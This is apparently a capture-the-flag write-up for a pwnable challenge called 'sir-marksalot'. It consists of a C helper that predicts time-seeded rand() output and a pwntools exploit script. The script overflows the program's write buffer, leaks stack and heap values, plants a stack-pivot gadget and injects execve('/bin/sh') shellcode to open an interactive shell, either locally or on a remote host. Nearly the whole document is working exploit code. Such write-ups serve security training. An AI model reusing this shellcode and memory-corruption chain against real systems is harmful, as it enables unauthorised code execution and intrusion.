Tags: write-what-where pwn pwnable
Rating: 1.0
timer.c
```C
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
int main() {
time_t t = time(0);
srand(t);
int n1 = rand() % 40;
int n2 = rand() % 40;
printf("%d\n", n1);
printf("%d\n", n2);
return 0;
}
```
```python
from pwn import *
def pwn():
n1 = int(h.recvline().strip())
n2 = int(h.recvline().strip())
r.sendline(b'jump up and down')
for x in range(n1):
r.recvuntil(b'):')
r.sendline(b'x')
r.sendafter(b'write?', b'A'*28 + p32(8))
r.recvuntil(b'):')
r.sendline(b'w')
for x in range(n2+1):
r.recvuntil(b'):')
r.sendline(b'x')
# shellcode to execute /bin/sh
payload = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
payload += b"\x90" * 5
payload += b"\x01"
r.sendlineafter(b'write?', payload)
r.recvuntil(b'):')
r.sendline(b'a')
r.recvuntil(b'written:')
junk = u64(r.recvline().strip().ljust(8, b'\x00'))
log.success(hex(junk))
r.recvuntil(b'):')
r.sendline(b'x')
r.sendlineafter(b'write?', p64(junk) + p64(0xffffffff00000000) + b'C'*12 + b'\x01')
r.recvuntil(b'):')
r.sendline(b'a')
r.recvuntil(b'written:')
junk = r.recvline().strip()
stack = u64(junk[-6:].ljust(8, b'\x00'))
log.success(hex(stack))
# write add rsp,0x20 ; jmp rsp
# and then jump to shellcode
r.recvuntil(b'):')
r.sendline(b'x')
r.sendlineafter(b'write?', b"\x90\x48\x83\xC4\x20\xFF\xE4\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + p64(stack))
r.interactive()
if __name__ == '__main__':
h = process('./a.out')
if len(sys.argv) > 1:
r = remote(sys.argv[1], int(sys.argv[2]))
else:
r = process(['./sir-marksalot'])
print(util.proc.pidof(r))
pwn()
```
